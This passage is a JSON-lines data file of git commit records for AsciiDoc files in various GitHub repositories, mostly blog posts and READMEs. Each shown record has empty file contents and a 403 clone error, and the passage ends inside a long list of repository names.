doc under docs\n","repos":"AsherBond\/gluster-site,AsherBond\/gluster-site,AsherBond\/gluster-site","old_file":"documentation\/architecture.adoc","new_file":"documentation\/architecture.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AsherBond\/gluster-site.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed0f33d8eca9e120e0966de270284c0190d2c1ec","subject":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","message":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"151c3f2957deab80335ce78cba5948005552787f","subject":"asciidoc sample document","message":"asciidoc sample document\n","repos":"AvaloniaUI\/AvaloniaEdit,AvaloniaUI\/AvaloniaEdit,AvaloniaUI\/AvaloniaEdit,AvaloniaUI\/AvaloniaEdit,AvaloniaUI\/AvaloniaEdit,AvaloniaUI\/AvaloniaEdit,AvaloniaUI\/AvaloniaEdit,AvaloniaUI\/AvaloniaEdit,AvaloniaUI\/AvaloniaEdit,AvaloniaUI\/AvaloniaEdit,AvaloniaUI\/AvaloniaEdit,AvaloniaUI\/AvaloniaEdit,AvaloniaUI\/AvaloniaEdit,AvaloniaUI\/AvaloniaEdit,AvaloniaUI\/AvaloniaEdit","old_file":"src\/AvaloniaEdit.Demo\/Resources\/SampleFiles\/document.adoc","new_file":"src\/AvaloniaEdit.Demo\/Resources\/SampleFiles\/document.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AvaloniaUI\/AvaloniaEdit.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e14fb954dd11cacc7864d0cfc3cd484f0470a2f3","subject":"Release 1.4.0","message":"Release 1.4.0\n","repos":"hibersap\/hibersap.github.io","old_file":"news\/2019-10-29-hibersap-1-4-0-released.adoc","new_file":"news\/2019-10-29-hibersap-1-4-0-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hibersap\/hibersap.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f84800ffd435e5f06b5cd9a9e0bc0ddd310c3a8d","subject":"1760 add phatomjs intall in the technical-manual.adoc","message":"1760 add phatomjs intall in the technical-manual.adoc\n","repos":"uclouvain\/OSIS-Louvain,uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"486f565053813400c993fada77948da3f785fe4e","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/10\/21\/deref.adoc","new_file":"content\/news\/2022\/10\/21\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"7edffc38f1e4f7609f3fa4d87856b0c335a608dd","subject":"Create sub.adoc","message":"Create sub.adoc","repos":"jauco\/asciidoctorbug","old_file":"subfolder\/sub.adoc","new_file":"subfolder\/sub.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jauco\/asciidoctorbug.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2572652f6bb7502aa098ed797c5227f46321f7c","subject":"Step 5 Update README","message":"Step 5\nUpdate README\n","repos":"Ovea\/bdd-todolist,Ovea\/bdd-todolist","old_file":"step-5\/README.adoc","new_file":"step-5\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ovea\/bdd-todolist.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f5d0245ef1fdfb55be17d17dbe065cd7533c72ea","subject":"y2b create post These crazy headphones might blow your mind","message":"y2b create post These crazy headphones might blow your mind","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-07-These-crazy-headphones-might-blow-your-mind.adoc","new_file":"_posts\/2016-07-07-These-crazy-headphones-might-blow-your-mind.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9354403689440c686c389f2c4f8196b361e70b07","subject":"Add blog post about JS","message":"Add blog post about JS\n","repos":"luck3y\/wildfly.org,stuartwdouglas\/wildfly.org,rhusar\/wildfly.org,adrianoschmidt\/wildfly.org,luck3y\/wildfly.org,rhusar\/wildfly.org,rhusar\/wildfly.org,adrianoschmidt\/wildfly.org,stuartwdouglas\/wildfly.org,ctomc\/wildfly.org,stuartwdouglas\/wildfly.org,stuartwdouglas\/wildfly.org,rhusar\/wildfly.org,ctomc\/wildfly.org,adrianoschmidt\/wildfly.org,ctomc\/wildfly.org,adrianoschmidt\/wildfly.org,luck3y\/wildfly.org,ctomc\/wildfly.org,luck3y\/wildfly.org","old_file":"news\/2015-08-10-Javascript-Support-In-Wildfly.adoc","new_file":"news\/2015-08-10-Javascript-Support-In-Wildfly.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rhusar\/wildfly.org.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0a905492c0c8fac1f9dd7c13a757af97dfd50709","subject":"Update 2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","message":"Update 2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","new_file":"_posts\/2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c42641c8948a1fd7f00fd9e760e5c18caa0f952a","subject":"y2b create post Unboxing Anki Overdrive","message":"y2b create post Unboxing Anki Overdrive","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-11-28-Unboxing-Anki-Overdrive.adoc","new_file":"_posts\/2015-11-28-Unboxing-Anki-Overdrive.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"786cd23b83256978d41b1595975e0d2c2a5d439b","subject":"Link HTTP","message":"Link HTTP\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Rest client Ex.adoc","new_file":"Rest client Ex.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7455fbf9334eebebf5e2db59f8224df489ad3baf","subject":"Update 2016-7-2-thinphp.adoc","message":"Update 2016-7-2-thinphp.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-7-2-thinphp.adoc","new_file":"_posts\/2016-7-2-thinphp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8ab66cff4ef41a808a4bf73bce532b7a20e3ca1f","subject":"Update 2017-02-21.adoc","message":"Update 2017-02-21.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2017-02-21.adoc","new_file":"_posts\/2017-02-21.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6a7a838bb4c7c66c3d4ff4b1c5f970efa6e8230","subject":"Update 2017-02-25.adoc","message":"Update 2017-02-25.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2017-02-25.adoc","new_file":"_posts\/2017-02-25.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eebf12cd5c3bc1ddedca3d6f55da268578dd2634","subject":"Update 2015-08-02-The-Tree.adoc","message":"Update 2015-08-02-The-Tree.adoc","repos":"conchitawurst\/conchitawurst.github.io,conchitawurst\/conchitawurst.github.io,conchitawurst\/conchitawurst.github.io","old_file":"_posts\/2015-08-02-The-Tree.adoc","new_file":"_posts\/2015-08-02-The-Tree.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/conchitawurst\/conchitawurst.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"230388c7b682ac47330641a826ea6a8ee4eb89f9","subject":"Update Kaui_Guide_Draft (4) (1).adoc","message":"Update Kaui_Guide_Draft (4) (1).adoc\n","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/kaui\/Kaui_Guide_Draft (4) (1).adoc","new_file":"userguide\/kaui\/Kaui_Guide_Draft (4) (1).adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1fb2f9785010804fa943424a56cb4fe81e9ac09a","subject":"Update 2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","message":"Update 2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","new_file":"_posts\/2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"89199c2694689062f0fdd205429196a3ffbe552b","subject":"Update 2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","message":"Update 2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","new_file":"_posts\/2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84889650e5a8d916190b3b92c9f2f5e983b1961f","subject":"Update Micro-Service-Casual-Talkmd-Microservice-Casual-Talks-20160314.adoc","message":"Update Micro-Service-Casual-Talkmd-Microservice-Casual-Talks-20160314.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/Micro-Service-Casual-Talkmd-Microservice-Casual-Talks-20160314.adoc","new_file":"_posts\/Micro-Service-Casual-Talkmd-Microservice-Casual-Talks-20160314.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"81146c0506648a1bf5fd4bbada04f8d0a71694d9","subject":"Update 2015-10-11-ATS-HTTPS.adoc","message":"Update 2015-10-11-ATS-HTTPS.adoc","repos":"cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io","old_file":"_posts\/2015-10-11-ATS-HTTPS.adoc","new_file":"_posts\/2015-10-11-ATS-HTTPS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cncgl\/cncgl.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7015e0e44ca4fe6fb7fad0704ccd7cbde456c1d2","subject":"Update 2016-10-07-Test-Blog.adoc","message":"Update 2016-10-07-Test-Blog.adoc","repos":"pramodjg\/articles,pramodjg\/articles,pramodjg\/articles,pramodjg\/articles","old_file":"_posts\/2016-10-07-Test-Blog.adoc","new_file":"_posts\/2016-10-07-Test-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pramodjg\/articles.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"01f1b6ab0c589238dc8953f829adc4a6e9c42f5a","subject":"Update 2017-08-01-Luku-Luku.adoc","message":"Update 2017-08-01-Luku-Luku.adoc","repos":"cringler\/cringler.github.io,cringler\/cringler.github.io,cringler\/cringler.github.io,cringler\/cringler.github.io","old_file":"_posts\/2017-08-01-Luku-Luku.adoc","new_file":"_posts\/2017-08-01-Luku-Luku.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cringler\/cringler.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cef73bf6e971283083b95e867650d5f444da4d75","subject":"Translate markdown files into asciidoc files","message":"Translate markdown files into asciidoc files\n\nWe are going to convert all of our documentation from markdown to\nasciidoc format, in order to take advantage of the additional features\nand semantic elements that asciidoc offers such as automatic section\nnumbering, admonitions and automatic table of contents (TOC) generation.\n\nConverting README.md by hand is going to be extremely tedious.\n\nAs such, as a step towards the full conversion of our documentation to\nasciidoc, let's enlist the help of pandoc[1] to translate our\ndocumentation.\n\nThe translation is done with pandoc 2.2.1 via this shell script:\n\n for x in $(find -name '*.md'); do\n pandoc -f markdown_github-hard_line_breaks --wrap=preserve --atx-headers -o \"${x%*.md}.adoc\" \"$x\"\n done\n\nWhile the majority of the translation is done faithfully, there are\nstill some errors here and there in the translated files. We will be\nfixing them in subsequent commits.\n\n[1] http:\/\/pandoc.org\/\n","repos":"se-edu\/addressbook-level1,se-edu\/addressbook-level1","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/se-edu\/addressbook-level1.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc027021d5c21897848ceb6ed13989736f3b1f62","subject":"[README] Add badge to Maven Central.","message":"[README] Add badge to Maven Central.","repos":"gallandarakhneorg\/afc,tpiotrow\/afc,DevFactory\/afc,DevFactory\/afc,gallandarakhneorg\/afc,DevFactory\/afc,gallandarakhneorg\/afc,tpiotrow\/afc,DevFactory\/afc,tpiotrow\/afc,tpiotrow\/afc,gallandarakhneorg\/afc,gallandarakhneorg\/afc","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tpiotrow\/afc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c84234277a0d0fac8bda2bcb5bb29723b259735f","subject":"Moved from Markdown to Asciidoc","message":"Moved from Markdown to Asciidoc\n","repos":"ysb33r\/groovy-vfs,ysb33r\/groovy-vfs","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ysb33r\/groovy-vfs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"edb9e10fcb57c989883a8f5ed5536f3e42f048e0","subject":"Update README.adoc","message":"Update README.adoc\n\nPesky colon...","repos":"Adyrhan\/adyrhan.github.io,yahussain\/yahussain.github.io,JithinPavithran\/JithinPavithran.github.io,pointout\/pointout.github.io,glitched01\/glitched01.github.io,ovo-6\/ovo-6.github.io,blahcadepodcast\/blahcadepodcast.github.io,havvazaman\/havvazaman.github.io,willyb321\/willyb321.github.io,buliaoyin\/buliaoyin.github.io,yeddiyarim\/yeddiyarim.github.io,scriptindex\/scriptindex.github.io,uzuyh\/hubpress.io,hubsaysnuaa\/hubsaysnuaa.github.io,jia1miao\/jia1miao.github.io,quangpc\/quangpc.github.io,faldah\/faldah.github.io,rohithkrajan\/rohithkrajan.github.io,mattpearson\/mattpearson.github.io,chris1234p\/chris1234p.github.io,devkamboj\/devkamboj.github.io,sidemachine\/sidemachine.github.io,justafool5\/justafool5.github.io,devananda\/devananda.github.io,pavistalli\/pavistalli.github.io,2wce\/2wce.github.io,jmelfi\/jmelfi.github.io,jblemee\/jblemee.github.io,innovation-yagasaki\/innovation-yagasaki.github.io,Murazaki\/murazaki.github.io,xfarm001\/xfarm001.github.io,chdask\/chdask.github.io,heliomsolivas\/heliomsolivas.github.io,mdinaustin\/mdinaustin.github.io,acristyy\/acristyy.github.io,plaidshirtguy\/plaidshirtguy.github.io,zubrx\/zubrx.github.io,rballan\/rballan.github.io,raghakot\/raghakot.github.io,tjfy1992\/tjfy1992.github.io,frenchduff\/frenchduff.github.io,ricardozanini\/ricardozanini.github.io,murilo140891\/murilo140891.github.io,Ellixo\/ellixo.github.io,rishipatel\/rishipatel.github.io,deivisk\/deivisk.github.io,ovo-6\/ovo-6.github.io,anggadjava\/anggadjava.github.io,endymion64\/endymion64.github.io,Oziabr\/Oziabr.github.io,rpawlaszek\/rpawlaszek.github.io,faldah\/faldah.github.io,NationalShowcase2016CentralMichigan\/nationalshowcase2016cm.github.io,anwfr\/blog.anw.fr,Andy4Craft\/andy4craft.github.io,innovation-jp\/innovation-jp.github.io,gardenias\/sddb.com,nnn-dev\/nnn-dev.github.io,der3k\/der3k.github.io,nnn-dev\/nnn-dev.github.io,chdask\/chdask.github.io,geummo\/geummo.github.io,heliomsolivas\/heliomsolivas.github.io,alchapone\/alchapone.github.io,stay-india\/stay-india.github.io,roelvs\/roelvs.github.io,namlongwp\/namlongwp.github.io,Kif11\/Kif11.github.io,pyxozjhi\/pyxozjhi.github.io,indusbox\/indusbox.github.io,wattsap\/wattsap.github.io,neomobil\/neomobil.github.io,2wce\/2wce.github.io,rage5474\/rage5474.github.io,itsallanillusion\/itsallanillusion.github.io,IdoramNaed\/idoramnaed.github.io,velo\/velo.github.io,deivisk\/deivisk.github.io,nickwanhere\/nickwanhere.github.io,fraslo\/fraslo.github.io,macchandev\/macchandev.github.io,glitched01\/glitched01.github.io,speedcom\/hubpress.io,modmaker\/modmaker.github.io,ashmckenzie\/ashmckenzie.github.io,Bulletninja\/bulletninja.github.io,sitexa\/hubpress.io,jonathandmoore\/jonathandmoore.github.io,devananda\/devananda.github.io,live-smart\/live-smart.github.io,caglarsayin\/hubpress,olavloite\/olavloite.github.io,ferandec\/ferandec.github.io,hirako2000\/hirako2000.github.io,LenguajesdeProgramacion-AlonsoCampos\/LenguajesdeProgramacion-AlonsoCampos.github.io,dvbnrg\/dvbnrg.github.io,TheGertproject\/TheGertproject.github.io,visionui\/visionui.github.io,raditv\/raditv.github.io,qu85101522\/qu85101522.github.io,xumr0x\/xumr0x.github.io,gerdbremer\/gerdbremer.github.io,jia1miao\/jia1miao.github.io,laposheureux\/laposheureux.github.io,GWCATT\/gwcatt.github.io,angilent\/angilent.github.io,popurax\/popurax.github.io,holtalanm\/holtalanm.github.io,AntoineTyrex\/antoinetyrex.github.io,jelitox\/jelitox.github.io,fbridault\/sandblog,Ugotsta\/Ugotsta.github.io,iolabailey\/iolabailey.github.io,hayyuelha\/technical-blog,hfluz\/hfluz.github.io,pallewela\/pallewela.github.io,suning-wireless\/Suning-Wireless.github.io,Ardemius\/ardemius.github.io,jgornati\/jgornati.github.io,olavloite\/olavloite.github.io,gerdbremer\/gerdbremer.github.io,xfarm001\/xfarm001.github.io,yangjae\/hubpress.io,FilipLaz\/filiplaz.github.io,deformat\/deformat.github.io,jkschneider\/jkschneider.github.io,birvajoshi\/birvajoshi.github.io,sebbrousse\/sebbrousse.github.io,LearningTools\/LearningTools.github.io,deformat\/deformat.github.io,lifengchuan2008\/lifengchuan2008.github.io,Olika120\/Olika120.github.io,gquintana\/gquintana.github.io,ntfnd\/ntfnd.github.io,reggert\/reggert.github.io,live-smart\/live-smart.github.io,thomaszahr\/thomaszahr.github.io,grzrobak\/grzrobak.github.io,wiibaa\/wiibaa.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,Aerodactyl\/aerodactyl.github.io,fbruch\/fbruch.github.com,murilo140891\/murilo140891.github.io,zubrx\/zubrx.github.io,fuzzy-logic\/fuzzy-logic.github.io,javathought\/javathought.github.io,qu85101522\/qu85101522.github.io,cmolitor\/blog,djmdata\/djmdata.github.io,kay\/kay.github.io,DullestSaga\/dullestsaga.github.io,ghostbind\/ghostbind.github.io,neomobil\/neomobil.github.io,noahrc\/noahrc.github.io,creative-coding-bonn\/creative-coding-bonn.github.io,yysk\/yysk.github.io,skeate\/skeate.github.io,ron194\/ron194.github.io,nicolasmaurice\/nicolasmaurice.github.io,stay-india\/stay-india.github.io,uskithub\/uskithub.github.io,Dhuck\/dhuck.github.io,hinaloe\/hubpress,endymion64\/VinJBlog,alchemistcookbook\/alchemistcookbook.github.io,esbrannon\/esbrannon.github.io,preteritoimperfecto\/preteritoimperfecto.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,SuperMMX\/supermmx.github.io,kay\/kay.github.io,anuragsingh31\/anuragsingh31.github.io,caryfitzhugh\/caryfitzhugh.github.io,miroque\/shirokuma,jonathandmoore\/jonathandmoore.github.io,tongqqiu\/tongqqiu.github.io,chrizco\/chrizco.github.io,jblemee\/jblemee.github.io,mattburnin\/hubpress.io,rlebron88\/rlebron88.github.io,christiannolte\/hubpress.io,pdudits\/pdudits.github.io,murilo140891\/murilo140891.github.io,gorjason\/gorjason.github.io,flug\/flug.github.io,tr00per\/tr00per.github.io,dsp25no\/blog.dsp25no.ru,jcsirot\/hubpress.io,caseyy\/caseyy.github.io,fbiville\/fbiville.github.io,karcot\/trial1,thrasos\/thrasos.github.io,deunz\/deunz.github.io,rohithkrajan\/rohithkrajan.github.io,thrasos\/thrasos.github.io,mattdoesinfosec\/mattdoesinfosec.github.io,jankolorenc\/jankolorenc.github.io,elidiazgt\/mind,thykka\/thykka.github.io,abien\/abien.github.io,dobin\/dobin.github.io,siarlex\/siarlex.github.io,pzmarzly\/pzmarzly.github.io,yeddiyarim\/yeddiyarim.github.io,DullestSaga\/dullestsaga.github.io,lxjk\/lxjk.github.io,darsto\/darsto.github.io,gdfuentes\/gdfuentes.github.io,daemotron\/daemotron.github.io,jlboes\/jlboes.github.io,elvarb\/elvarb.github.io,ron194\/ron194.github.io,lerzegov\/lerzegov.github.io,deunz\/deunz.github.io,Rackcore\/Rackcore.github.io,allancorra\/allancorra.github.io,chbailly\/chbailly.github.io,zestyroxy\/zestyroxy.github.io,xmichaelx\/xmichaelx.github.io,hyha600\/hyha600.github.io,chakbun\/chakbun.github.io,cringler\/cringler.github.io,ahopkins\/amhopkins.com,soyabeen\/soyabeen.github.io,deunz\/deunz.github.io,kai-cn\/kai-cn.github.io,al1enSuu\/al1enSuu.github.io,cloudmind7\/cloudmind7.github.com,ioisup\/ioisup.github.io,lxjk\/lxjk.github.io,alimasyhur\/alimasyhur.github.io,vanpelt\/vanpelt.github.io,jbroszat\/jbroszat.github.io,xavierdono\/xavierdono.github.io,PertuyF\/PertuyF.github.io,raloliver\/raloliver.github.io,sfoubert\/sfoubert.github.io,fasigpt\/fasigpt.github.io,gruenberg\/gruenberg.github.io,FRC125\/FRC125.github.io,Bloggerschmidt\/bloggerschmidt.de,thykka\/thykka.github.io,parkowski\/parkowski.github.io,ashmckenzie\/ashmckenzie.github.io,fasigpt\/fasigpt.github.io,rpwolff\/rpwolff.github.io,flipswitchingmonkey\/flipswitchingmonkey.github.io,furcon\/furcon.github.io,conchitawurst\/conchitawurst.github.io,sandersky\/sandersky.github.io,shinchiro\/shinchiro.github.io,foxsofter\/hubpress.io,CreditCardsCom\/creditcardscom.github.io,hinaloe\/hubpress,iwakuralai-n\/badgame-site,silesnet\/silesnet.github.io,kai-cn\/kai-cn.github.io,triskell\/triskell.github.io,kreids\/kreids.github.io,bretonio\/bretonio.github.io,cloudmind7\/cloudmind7.github.com,sebbrousse\/sebbrousse.github.io,deruelle\/deruelle.github.io,camilo28\/camilo28.github.io,MartinAhrer\/martinahrer.github.io,gjagush\/gjagush.github.io,allancorra\/allancorra.github.io,blater\/blater.github.io,fqure\/fqure.github.io,LenguajesdeProgramacion-AlonsoCampos\/LenguajesdeProgramacion-AlonsoCampos.github.io,saptaksen\/saptaksen.github.io,debbiezhu\/debbiezhu.github.io,minditech\/minditech.github.io,diogoan\/diogoan.github.io,eduardo76609\/eduardo76609.github.io,homenslibertemse\/homenslibertemse.github.io,kr-b\/kr-b.github.io,iolabailey\/iolabailey.github.io,realraindust\/realraindust.github.io,deivisk\/deivisk.github.io,crisgoncalves\/crisgoncalves.github.io,mouseguests\/mouseguests.github.io,woehrl01\/woehrl01.hubpress.io,speedcom\/hubpress.io,rballan\/rballan.github.io,IdoramNaed\/idoramnaed.github.io,djmdata\/djmdata.github.io,cringler\/cringler.github.io,cloudmind7\/cloudmind7.github.com,amodig\/amodig.github.io,fuhrerscene\/fuhrerscene.github.io,PierreBtz\/pierrebtz.github.io,xavierdono\/xavierdono.github.io,patricekrakow\/patricekrakow.github.io,harquail\/harquail.github.io,realraindust\/realraindust.github.io,metasean\/blog,caglarsayin\/hubpress,crimarde\/crimarde.github.io,juliardi\/juliardi.github.io,twentyTwo\/twentyTwo.github.io,davehardy20\/davehardy20.github.io,atfd\/hubpress.io,jlboes\/jlboes.github.io,simevidas\/simevidas.github.io,livehua\/livehua.github.io,birvajoshi\/birvajoshi.github.io,scriptindex\/scriptindex.github.io,elidiazgt\/mind,railsdev\/railsdev.github.io,Adyrhan\/adyrhan.github.io,nickwanhere\/nickwanhere.github.io,neurodiversitas\/neurodiversitas.github.io,everydaynormalgeek\/everydaynormalgeek.github.io,triskell\/triskell.github.io,esbrannon\/esbrannon.github.io,backemulus\/backemulus.github.io,extrapolate\/extrapolate.github.io,Vanilla-Java\/vanilla-java.github.io,codechunks\/codechunks.github.io,sinemaga\/sinemaga.github.io,spikebachman\/spikebachman.github.io,masonc15\/masonc15.github.io,Aerodactyl\/aerodactyl.github.io,bithunshal\/shalsblog,prateekjadhwani\/prateekjadhwani.github.io,jaganz\/jaganz.github.io,GDGSriLanka\/blog,Zatttch\/zatttch.github.io,itsallanillusion\/itsallanillusion.github.io,christianmtr\/christianmtr.github.io,evolgenomology\/evolgenomology.github.io,romanegunkov\/romanegunkov.github.io,hubsaysnuaa\/hubsaysnuaa.github.io,havvazaman\/havvazaman.github.io,hapee\/hapee.github.io,Joecakes4u\/joecakes4u.github.io,fabself\/fabself.github.io,jaslyn94\/jaslyn94.github.io,sebasmonia\/sebasmonia.github.io,eunas\/eunas.github.io,gardenias\/sddb.com,tripleonard\/tripleonard.github.io,arthurmolina\/arthurmolina.github.io,enderxyz\/enderxyz.github.io,bretonio\/bretonio.github.io,tongqqiu\/tongqqiu.github.io,sebbrousse\/sebbrousse.github.io,chdask\/chdask.github.io,kunicmarko20\/kunicmarko20.github.io,extrapolate\/extrapolate.github.io,dakeshi\/dakeshi.github.io,RaphaelSparK\/RaphaelSparK.github.io,sinemaga\/sinemaga.github.io,tkountis\/tkountis.github.io,fbruch\/fbruch.github.com,costalfy\/costalfy.github.io,14FRS851\/14FRS851.github.io,ahopkins\/amhopkins.com,evolgenomology\/evolgenomology.github.io,drankush\/drankush.github.io,Ellixo\/ellixo.github.io,dannylane\/dannylane.github.io,studiocardo\/studiocardo.github.io,der3k\/der3k.github.io,ThomasLT\/thomaslt.github.io,milantracy\/milantracy.github.io,karcot\/trial1,chaseey\/chaseey.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,AppHat\/AppHat.github.io,hinaloe\/hubpress,alphaskade\/alphaskade.github.io,olivierbellone\/olivierbellone.github.io,Motsai\/old-repo-to-